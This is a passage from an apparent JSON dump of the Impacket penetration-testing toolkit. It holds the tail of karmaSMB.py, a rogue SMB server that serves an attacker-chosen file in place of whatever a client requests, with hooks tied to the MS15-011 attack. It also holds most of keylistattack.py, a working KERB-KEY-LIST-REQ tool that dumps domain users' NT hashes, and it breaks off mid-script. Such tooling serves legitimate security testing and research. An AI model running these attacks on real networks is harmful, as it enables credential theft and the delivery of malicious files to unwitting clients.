ConfigParser.ConfigParser()\n smbConfig.add_section('global')\n smbConfig.set('global','server_name','server_name')\n smbConfig.set('global','server_os','UNIX')\n smbConfig.set('global','server_domain','WORKGROUP')\n smbConfig.set('global','log_file','None')\n smbConfig.set('global','credentials_file','')\n\n # IPC always needed\n smbConfig.add_section('IPC$')\n smbConfig.set('IPC$','comment','Logon server share')\n smbConfig.set('IPC$','read only','yes')\n smbConfig.set('IPC$','share type','3')\n smbConfig.set('IPC$','path','')\n\n # NETLOGON always needed\n smbConfig.add_section('NETLOGON')\n smbConfig.set('NETLOGON','comment','Logon server share')\n smbConfig.set('NETLOGON','read only','no')\n smbConfig.set('NETLOGON','share type','0')\n smbConfig.set('NETLOGON','path','')\n\n # SYSVOL always needed\n smbConfig.add_section('SYSVOL')\n smbConfig.set('SYSVOL','comment','')\n smbConfig.set('SYSVOL','read only','no')\n smbConfig.set('SYSVOL','share type','0')\n smbConfig.set('SYSVOL','path','')\n\n if smb2Support:\n smbConfig.set(\"global\", \"SMB2Support\", \"True\")\n\n self.server = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)\n self.server.processConfigFile()\n\n # Unregistering some dangerous and unwanted commands\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)\n self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)\n\n self.server.unregisterSmb2Command(smb2.SMB2_WRITE)\n\n self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)\n self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)\n self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)\n self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)\n\n # And the same for SMB2\n self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)\n self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)\n self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)\n self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)\n self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)\n\n # Now we have to register the MS-SRVS server. This specially important for \n # Windows 7+ and Mavericks clients since they WON'T (specially OSX) \n # ask for shares using MS-RAP.\n\n self.__srvsServer = SRVSServer()\n self.__srvsServer.daemon = True\n self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))\n\n def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):\n connData = smbServer.getConnectionData(connId)\n\n respSetup = b''\n respParameters = b''\n respData = b''\n findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)\n\n # 1. Let's grab the extension and map the file's contents we will deliver\n origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\\\','/'))\n origFileName = os.path.basename(origPathName)\n\n _, origPathNameExtension = os.path.splitext(origPathName)\n origPathNameExtension = origPathNameExtension.upper()[1:]\n\n if origPathNameExtension.upper() in self.extensions:\n targetFile = self.extensions[origPathNameExtension.upper()]\n else:\n targetFile = self.defaultFile\n\n if recvPacket['Tid'] in connData['ConnectedShares']:\n path = connData['ConnectedShares'][recvPacket['Tid']]['path']\n\n # 2. We call the normal findFirst2 call, but with our targetFile\n searchResult, searchCount, errorCode = findFirst2(path, \n targetFile, \n findFirst2Parameters['InformationLevel'], \n findFirst2Parameters['SearchAttributes'], pktFlags = recvPacket['Flags2'] )\n\n respParameters = smb.SMBFindFirst2Response_Parameters()\n endOfSearch = 1\n sid = 0x80 # default SID\n searchCount = 0\n totalData = 0\n for i in enumerate(searchResult):\n #i[1].dump()\n try:\n # 3. And we restore the original filename requested ;)\n i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)\n except:\n pass\n\n data = i[1].getData()\n lenData = len(data)\n if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:\n # We gotta stop here and continue on a find_next2\n endOfSearch = 0\n # Simple way to generate a fid\n if len(connData['SIDs']) == 0:\n sid = 1\n else:\n sid = list(connData['SIDs'].keys())[-1] + 1\n # Store the remaining search results in the ConnData SID\n connData['SIDs'][sid] = searchResult[i[0]:]\n respParameters['LastNameOffset'] = totalData\n break\n else:\n searchCount +=1\n respData += data\n totalData += lenData\n \n\n respParameters['SID'] = sid\n respParameters['EndOfSearch'] = endOfSearch\n respParameters['SearchCount'] = searchCount\n else:\n errorCode = STATUS_SMB_BAD_TID \n\n smbServer.setConnectionData(connId, connData)\n\n return respSetup, respParameters, respData, errorCode\n\n def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):\n connData = smbServer.getConnectionData(connId)\n\n ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])\n ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])\n\n respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)\n\n #ntCreateAndXParameters.dump()\n\n # Let's try to avoid allowing write requests from the client back to us\n # not 100% bulletproof, plus also the client might be using other SMB\n # calls (e.g. SMB_COM_WRITE)\n createOptions = ntCreateAndXParameters['CreateOptions']\n if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:\n errorCode = STATUS_ACCESS_DENIED\n else:\n errorCode = STATUS_SUCCESS\n\n if errorCode == STATUS_ACCESS_DENIED:\n return [respSMBCommand], None, errorCode\n\n # 1. Let's grab the extension and map the file's contents we will deliver\n origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\\\','/'))\n\n _, origPathNameExtension = os.path.splitext(origPathName)\n origPathNameExtension = origPathNameExtension.upper()[1:]\n\n if origPathNameExtension.upper() in self.extensions:\n targetFile = self.extensions[origPathNameExtension.upper()]\n else:\n targetFile = self.defaultFile\n \n # 2. We change the filename in the request for our targetFile\n ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)\n SMBCommand['Data'] = ntCreateAndXData.getData()\n smbServer.log(\"%s is asking for %s. Delivering %s\" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)\n\n # 3. We call the original call with our modified data\n return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)\n\n def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):\n # The trick we play here is that Windows clients first ask for the file\n # and then it asks for the directory containing the file.\n # It is important to answer the right questions for the attack to work\n \n connData = smbServer.getConnectionData(connId)\n\n respSetup = b''\n respParameters = b''\n respData = b''\n errorCode = 0\n\n queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)\n\n if recvPacket['Tid'] in connData['ConnectedShares']:\n path = ''\n try:\n origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])\n origPathName = os.path.normpath(origPathName.replace('\\\\','/'))\n\n if ('MS15011' in connData) is False:\n connData['MS15011'] = {}\n\n smbServer.log(\"Client is asking for QueryPathInformation for: %s\" % origPathName,logging.INFO)\n if origPathName in connData['MS15011'] or origPathName == '.':\n # We already processed this entry, now it's asking for a directory\n infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])\n else:\n # First time asked, asking for the file\n infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])\n connData['MS15011'][os.path.dirname(origPathName)] = infoRecord\n except Exception as e:\n #import traceback\n #traceback.print_exc()\n smbServer.log(\"queryPathInformation: %s\" % e,logging.ERROR)\n\n if infoRecord is not None:\n respParameters = smb.SMBQueryPathInformationResponse_Parameters()\n respData = infoRecord\n else:\n errorCode = STATUS_SMB_BAD_TID\n \n smbServer.setConnectionData(connId, connData)\n\n return respSetup, respParameters, respData, errorCode\n\n def smb2Read(self, connId, smbServer, recvPacket):\n connData = smbServer.getConnectionData(connId)\n connData['MS15011']['StopConnection'] = True\n smbServer.setConnectionData(connId, connData)\n return self.origsmb2Read(connId, smbServer, recvPacket)\n \n def smb2Close(self, connId, smbServer, recvPacket):\n connData = smbServer.getConnectionData(connId)\n # We're closing the connection trying to flush the client's\n # cache.\n if connData['MS15011']['StopConnection'] is True:\n return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED\n return self.origsmb2Close(connId, smbServer, recvPacket)\n\n def smb2Create(self, connId, smbServer, recvPacket):\n connData = smbServer.getConnectionData(connId)\n\n ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])\n\n # Let's try to avoid allowing write requests from the client back to us\n # not 100% bulletproof, plus also the client might be using other SMB\n # calls \n createOptions = ntCreateRequest['CreateOptions']\n if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:\n errorCode = STATUS_ACCESS_DENIED\n elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:\n errorCode = STATUS_ACCESS_DENIED\n else:\n errorCode = STATUS_SUCCESS\n\n if errorCode == STATUS_ACCESS_DENIED:\n return [smb2.SMB2Error()], None, errorCode\n\n # 1. Let's grab the extension and map the file's contents we will deliver\n origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\\\','/'))\n\n _, origPathNameExtension = os.path.splitext(origPathName)\n origPathNameExtension = origPathNameExtension.upper()[1:]\n\n # Are we being asked for a directory?\n if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:\n if origPathNameExtension.upper() in self.extensions:\n targetFile = self.extensions[origPathNameExtension.upper()]\n else:\n targetFile = self.defaultFile\n connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)\n smbServer.log(\"%s is asking for %s. Delivering %s\" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)\n else:\n targetFile = '/'\n \n # 2. We change the filename in the request for our targetFile\n try:\n ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')\n except UnicodeDecodeError:\n import sys\n ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le')\n ntCreateRequest['NameLength'] = len(targetFile)*2\n recvPacket['Data'] = ntCreateRequest.getData()\n\n # 3. We call the original call with our modified data\n return self.origsmb2Create(connId, smbServer, recvPacket)\n\n def smb2QueryDirectory(self, connId, smbServer, recvPacket):\n # Windows clients with SMB2 will also perform a QueryDirectory\n # expecting to get the filename asked. So we deliver it :)\n connData = smbServer.getConnectionData(connId)\n\n respSMBCommand = smb2.SMB2QueryDirectory_Response()\n #queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])\n\n errorCode = 0xff\n respSMBCommand['Buffer'] = b'\\x00'\n\n errorCode = STATUS_SUCCESS\n\n #if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:\n # return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED\n\n if connData['MS15011']['FindDone'] is True:\n \n connData['MS15011']['FindDone'] = False\n smbServer.setConnectionData(connId, connData)\n return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES \n else:\n origName, targetFile = connData['MS15011']['FileData']\n (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)\n\n infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )\n infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE\n\n infoRecord['EaSize'] = 0\n infoRecord['EndOfFile'] = size\n infoRecord['AllocationSize'] = size\n infoRecord['CreationTime'] = smb.POSIXtoFT(ctime)\n infoRecord['LastAccessTime'] = smb.POSIXtoFT(atime)\n infoRecord['LastWriteTime'] = smb.POSIXtoFT(mtime)\n infoRecord['LastChangeTime'] = smb.POSIXtoFT(mtime)\n infoRecord['ShortName'] = b'\\x00'*24\n #infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')\n infoRecord['FileName'] = origName.encode('utf-16le')\n padLen = (8-(len(infoRecord) % 8)) % 8\n infoRecord['NextEntryOffset'] = 0\n\n respSMBCommand['OutputBufferOffset'] = 0x48\n respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())\n respSMBCommand['Buffer'] = infoRecord.getData() + b'\\xaa'*padLen\n connData['MS15011']['FindDone'] = True\n\n smbServer.setConnectionData(connId, connData)\n return [respSMBCommand], None, errorCode\n\n def smb2TreeConnect(self, connId, smbServer, recvPacket):\n connData = smbServer.getConnectionData(connId)\n\n respPacket = smb2.SMB2Packet()\n respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR\n respPacket['Status'] = STATUS_SUCCESS\n respPacket['CreditRequestResponse'] = 1\n respPacket['Command'] = recvPacket['Command']\n respPacket['SessionID'] = connData['Uid']\n respPacket['Reserved'] = recvPacket['Reserved']\n respPacket['MessageID'] = recvPacket['MessageID']\n respPacket['TreeID'] = recvPacket['TreeID']\n\n respSMBCommand = smb2.SMB2TreeConnect_Response()\n\n treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])\n\n errorCode = STATUS_SUCCESS\n\n ## Process here the request, does the share exist?\n path = recvPacket.getData()[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]\n UNCOrShare = path.decode('utf-16le')\n\n # Is this a UNC?\n if ntpath.ismount(UNCOrShare):\n path = UNCOrShare.split('\\\\')[3]\n else:\n path = ntpath.basename(UNCOrShare)\n\n # We won't search for the share.. all of them exist :P\n #share = searchShare(connId, path.upper(), smbServer) \n connData['MS15011'] = {}\n connData['MS15011']['FindDone'] = False\n connData['MS15011']['StopConnection'] = False\n share = {}\n if share is not None:\n # Simple way to generate a Tid\n if len(connData['ConnectedShares']) == 0:\n tid = 1\n else:\n tid = list(connData['ConnectedShares'].keys())[-1] + 1\n connData['ConnectedShares'][tid] = share\n connData['ConnectedShares'][tid]['path'] = '/'\n connData['ConnectedShares'][tid]['shareName'] = path\n respPacket['TreeID'] = tid\n #smbServer.log(\"Connecting Share(%d:%s)\" % (tid,path))\n else:\n smbServer.log(\"SMB2_TREE_CONNECT not found %s\" % path, logging.ERROR)\n errorCode = STATUS_OBJECT_PATH_NOT_FOUND\n respPacket['Status'] = errorCode\n ##\n\n if path == 'IPC$':\n respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE\n respSMBCommand['ShareFlags'] = 0x30\n else:\n respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK\n respSMBCommand['ShareFlags'] = 0x0\n\n respSMBCommand['Capabilities'] = 0\n respSMBCommand['MaximalAccess'] = 0x011f01ff\n\n respPacket['Data'] = respSMBCommand\n\n smbServer.setConnectionData(connId, connData)\n\n return None, [respPacket], errorCode\n\n def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):\n connData = smbServer.getConnectionData(connId)\n\n resp = smb.NewSMBPacket()\n resp['Flags1'] = smb.SMB.FLAGS1_REPLY\n resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \\\n recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE\n\n resp['Tid'] = recvPacket['Tid']\n resp['Mid'] = recvPacket['Mid']\n resp['Pid'] = connData['Pid']\n\n respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)\n respParameters = smb.SMBTreeConnectAndXResponse_Parameters()\n respData = smb.SMBTreeConnectAndXResponse_Data()\n\n treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])\n\n if treeConnectAndXParameters['Flags'] & 0x8:\n respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()\n\n treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )\n treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']\n treeConnectAndXData.fromString(SMBCommand['Data'])\n\n errorCode = STATUS_SUCCESS\n\n UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])\n\n # Is this a UNC?\n if ntpath.ismount(UNCOrShare):\n path = UNCOrShare.split('\\\\')[3]\n else:\n path = ntpath.basename(UNCOrShare)\n\n # We won't search for the share.. all of them exist :P\n smbServer.log(\"TreeConnectAndX request for %s\" % path, logging.INFO)\n #share = searchShare(connId, path, smbServer) \n share = {}\n # Simple way to generate a Tid\n if len(connData['ConnectedShares']) == 0:\n tid = 1\n else:\n tid = list(connData['ConnectedShares'].keys())[-1] + 1\n connData['ConnectedShares'][tid] = share\n connData['ConnectedShares'][tid]['path'] = '/'\n connData['ConnectedShares'][tid]['shareName'] = path\n resp['Tid'] = tid\n #smbServer.log(\"Connecting Share(%d:%s)\" % (tid,path))\n\n respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS\n\n if path == 'IPC$':\n respData['Service'] = 'IPC'\n else:\n respData['Service'] = path\n respData['PadLen'] = 0\n respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' ).decode()\n\n respSMBCommand['Parameters'] = respParameters\n respSMBCommand['Data'] = respData \n\n resp['Uid'] = connData['Uid']\n resp.addCommand(respSMBCommand)\n smbServer.setConnectionData(connId, connData)\n\n return None, [resp], errorCode\n\n def _start(self):\n self.server.serve_forever()\n\n def run(self):\n logging.info(\"Setting up SMB Server\")\n self._start()\n\n def setDefaultFile(self, filename):\n self.defaultFile = filename\n\n def setExtensionsConfig(self, filename):\n for line in filename.readlines():\n line = line.strip('\\r\\n ')\n if line.startswith('#') is not True and len(line) > 0:\n extension, pathName = line.split('=')\n self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())\n\n# Process command-line arguments.\nif __name__ == '__main__':\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = False, description = \"For every file request received, this module will \"\n \"return the pathname contents\")\n parser.add_argument(\"--help\", action=\"help\", help='show this help message and exit')\n parser.add_argument('fileName', action='store', metavar = 'pathname', help=\"Pathname's contents to deliver to SMB \"\n \"clients\")\n parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map '\n 'extensions to files to deliver. For those extensions not present, pathname will be delivered')\n parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n try:\n options = parser.parse_args()\n except Exception as e:\n logging.critical(str(e))\n sys.exit(1)\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n s = KarmaSMBServer(options.smb2support)\n s.setDefaultFile(os.path.normpath(options.fileName))\n if options.config is not None:\n s.setExtensionsConfig(options.config)\n\n s.start()\n \n logging.info(\"Servers started, waiting for connections\")\n while True:\n try:\n sys.stdin.read()\n except KeyboardInterrupt:\n sys.exit(1)\n else:\n pass\n" }, { "path": "examples/keylistattack.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Performs the KERB-KEY-LIST-REQ attack to dump secrets\n# from the remote machine without executing any agent there\n#\n# If the SMB credentials are supplied, the script starts by\n# enumerating the domain users via SAMR. Otherwise, the attack\n# is executed against the specified targets.\n#\n# Examples:\n# ./keylistdump.py contoso.com/jdoe:pass@dc01 -rodcNo 20000 -rodcKey \n# ./keylistdump.py contoso.com/jdoe:pass@dc01 -rodcNo 20000 -rodcKey -full\n# ./keylistdump.py -kdc dc01.contoso.com -t victim -rodcNo 20000 -rodcKey LIST\n# ./keylistdump.py -kdc dc01 -domain contoso.com -tf targetfile.txt -rodcNo 20000 -rodcKey LIST\n#\n# Author:\n# Leandro Cuozzo (@0xdeaddood)\n#\n\nimport logging\nimport os\nimport random\n\nfrom impacket.examples import logger\nfrom impacket.examples.secretsdump import RemoteOperations, KeyListSecrets\nfrom impacket.examples.utils import parse_target\nfrom impacket.krb5 import constants\nfrom impacket.krb5.types import Principal\nfrom impacket.smbconnection import SMBConnection\nfrom impacket import version\n\ntry:\n rand = random.SystemRandom()\nexcept NotImplementedError:\n rand = random\n pass\n\n\nclass KeyListDump:\n def __init__(self, remoteName, username, password, domain, options, enum, targets):\n self.__domain = domain\n self.__username = username\n self.__password = password\n self.__aesKey = options.aesKey\n self.__doKerberos = options.k\n self.__aesKeyRodc = options.rodcKey\n self.__remoteName = remoteName\n self.__remoteHost = options.target_ip\n self.__kdcHost = options.dc_ip\n self.__rodc = options.rodcNo\n # self.__kvno = 1\n self.__enum = enum\n self.__targets = targets\n self.__full = options.full\n self.__smbConnection = None\n self.__remoteOps = None\n self.__keyListSecrets = None\n\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n else:\n self.__lmhash = ''\n self.__nthash = ''\n\n def connect(self):\n try:\n self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)\n if self.__doKerberos:\n self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey, self.__kdcHost)\n else:\n self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash)\n except Exception as e:\n if os.getenv('KRB5CCNAME') is not None and self.__doKerberos is True:\n # SMBConnection failed. That might be because there was no way to log into the\n # target system. We just have a last resort. Hope we have tickets cached and that they\n # will work\n logging.debug('SMBConnection didn\\'t work, hoping Kerberos will help (%s)' % str(e))\n pass\n else:\n raise\n\n def run(self):\n if self.__enum is True:\n self.connect()\n self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)\n self.__remoteOps.connectSamr(self.__domain)\n self.__keyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)\n logging.info('Enumerating target users. This may take a while on large domains')\n if self.__full is True:\n targetList = self.getAllDomainUsers()\n else:\n targetList = self.__keyListSecrets.getAllowedUsersToReplicate()\n else:\n logging.info('Using target users provided by parameter')\n self.__keyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, None)\n targetList = self.__targets\n\n logging.info('Dumping Domain Credentials (domain\\\\uid:[rid]:nthash)')\n logging.info('Using the KERB-KEY-LIST request method. Tickets everywhere!')\n for targetUser in targetList:\n user = targetUser.split(\":\")[0]\n targetUserName = Principal('%s' % user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n partialTGT, sessionKey = self.__keyListSecrets.createPartialTGT(targetUserName)\n fullTGT = self.__keyListSecrets.getFullTGT(targetUserName, partialTGT, sessionKey)\n if fullTGT is not None:\n key = self.__keyListSecrets.getKey(fullTGT, sessionKey)\n print(self.__domain + \"\\\\\" + targetUser + \":\" + key[2:])\n\n def getAllDomainUsers(self):\n resp = self.__remoteOps.getDomainUsers()\n # Users not allowed to replicate passwords by default\n deniedUsers = [500, 501, 502, 503]\n targetList = []\n for user in resp['Buffer']['Buffer']:\n if user['RelativeId'] not in deniedUsers and \"krbtgt_\" not in user['Name']:\n targetList.append(user['Name'] + \":\" + str(user['RelativeId']))\n\n return targetList\n\n\nif __name__ == '__main__':\n import argparse\n import sys\n\n try:\n import pyasn1\n from pyasn1.type.univ import noValue, SequenceOf, Integer\n except ImportError:\n print('This module needs pyasn1 installed')\n sys.exit(1)\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Performs the KERB-KEY-LIST-REQ attack to dump \"\n \"secrets from the remote machine without executing any agent there.\")\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@] (Use this credential '\n 'to authenticate to SMB and list domain users (low-privilege account) or LIST'\n ' (if you want to parse a target file) ')\n parser.add_argument('-rodcNo', action='store', type=int, help='Number of the RODC krbtgt account')\n parser.add_argument('-rodcKey', action='store', help='AES key of the Read Only Domain Controller')\n parser.add_argument('-full', action='store_true', default=False, help='Run the attack against all domain users. '\n 'Noisy! It could lead to more TGS requests being rejected')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('LIST option')\n group.add_argument('-domain', action='store', help='The fully qualified domain name (only works with LIST)')\n group.add_argument('-kdc', action='store', help='KDC HostName or FQDN (only works with LIST)')\n group.add_argument('-t', action='store', help='Attack only the username specified (only works with LIST)')\n group.add_argument('-tf', action='store', help='File that contains a list of target usernames (only works with LIST)')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='Use NTLM hashes to authenticate to SMB '\n 'and list domain users.')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos to authenticate to SMB and list domain users. Grabs '\n 'credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot '\n 'be found, it will use the ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication'\n ' (128 or 256 bits)')\n group = parser.add_argument_group('connection')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n if options.rodcNo is None:\n logging.error(\"You must specify the RODC number (krbtgt_XXXXX)\")\n sys.exit(1)\n if options.rodcKey is None:\n logging.error(\"You must specify the RODC aes key\")\n sys.exit(1)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if remoteName == '':\n logging.error(\"You must specify a target or set the option LIST\")\n sys.exit(1)\n\n if remoteName == 'LIST':\n targets = []\n if options.full is True:\n logging.warning(\"Flag -full will have no effect\")\n if options.t is not None:\n targets.append(options.t)\n elif options.tf is not None:\n try:\n with open(options.tf, 'r') as f:\n for line in f:\n target = line.strip()\n if target != '' and target[0] != '#':\n targets.append(target + \":\" + \"N/A\")\n except IOError as error:\n logging.error(\"Could not open file: %s - %s\", options.tf, str(error))\n sys.exit(1)\n if len(targets) == 0:\n logging.error(\"No valid targets specified!\")\n sys.exit(1)\n else:\n logging.error(\"You must specify a target username or targets file\")\n sys.exit(1)\n\n if options.kdc is not None:\n if '.' in options.kdc:\n remoteName, domain = options.kdc.split('.', 1)\n else:\n remoteName = options.kdc\n else:\n logging.error(\"You must specify the KDC HostName or FQDN\")\n sys.exit(1)\n\n if options.target_ip is None:\n options.target_ip = remoteName\n if options.domain is not None:\n domain = options.domain\n if domain == '':\n logging.error(\"You must specify a target domain. Use the flag -domain or define a FQDN in flag -kdc\")\n sys.exit(1)\n\n keylistdumper = KeyListDump(remoteName, username, password, domain, options, False, targets)\n else:\n if '@' not in options.target:\n 